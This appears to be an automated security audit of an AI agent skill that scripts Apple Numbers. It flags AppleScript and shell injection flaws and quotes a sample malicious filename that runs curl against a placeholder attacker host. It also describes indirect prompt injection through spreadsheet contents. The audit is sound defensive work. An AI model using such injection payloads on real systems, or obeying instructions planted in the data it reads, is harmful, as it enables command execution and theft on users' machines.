Skills
NYC
skills/spillwavesolutions/automating-mac-apps-plugin/automating-numbers/Gen Agent Trust Hub

automating-numbers

Fail

Audited by Gen Agent Trust Hub on Feb 17, 2026

Risk Level: HIGHCOMMAND_EXECUTIONDATA_EXFILTRATION
Full Analysis
  • [COMMAND_EXECUTION] (HIGH): AppleScript Injection vulnerability in multiple Python scripts.
  • Evidence: scripts/create_numbers_spreadsheet.py, scripts/export_numbers_to_csv.py, and scripts/read_numbers_spreadsheet.py use f-strings to construct AppleScript strings executed via osascript.
  • Details: User-provided variables like save_path, input_file, and file_path are resolved using Path.resolve() but are not escaped for double quotes. An attacker providing a filename such as test.numbers" & (do shell script "curl http://attacker.com/ex") & "` could execute arbitrary shell commands on the host.
  • [COMMAND_EXECUTION] (HIGH): Shell Injection in JXA script.
  • Evidence: scripts/create_skills_spreadsheet.js uses app.doShellScript with template literals containing file paths retrieved from the system.
  • Details: The script iterates through file paths found via find and interpolates them directly into a stat command: app.doShellScript("stat -f%z '${filePath}'..."). If a file or directory name contains shell metacharacters (e.g., backticks or semicolons), it results in arbitrary command execution.
  • [DATA_EXFILTRATION] (LOW): Information exposure through hardcoded local paths.
  • Evidence: scripts/create_skills_spreadsheet.js hardcodes a specific absolute path: /Users/richardhightower/clients/spillwave/....
  • Details: This exposes the local username and internal directory structure of the developer's environment to the agent and potentially to users of the skill.
  • [INDIRECT_PROMPT_INJECTION] (LOW): Susceptibility to malicious content in processed data.
  • Ingestion points: scripts/read_numbers_spreadsheet.py (reads spreadsheet cell values) and scripts/create_skills_spreadsheet.js (reads file system metadata).
  • Boundary markers: Absent. There are no delimiters or instructions to the LLM to ignore instructions embedded within the spreadsheet data.
  • Capability inventory: The skill has Bash, Read, and Write permissions, and can execute system-level automation via AppleScript and shell scripts.
  • Sanitization: None. Data is read from external files and processed or printed without escaping or validation.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Feb 17, 2026, 06:27 PM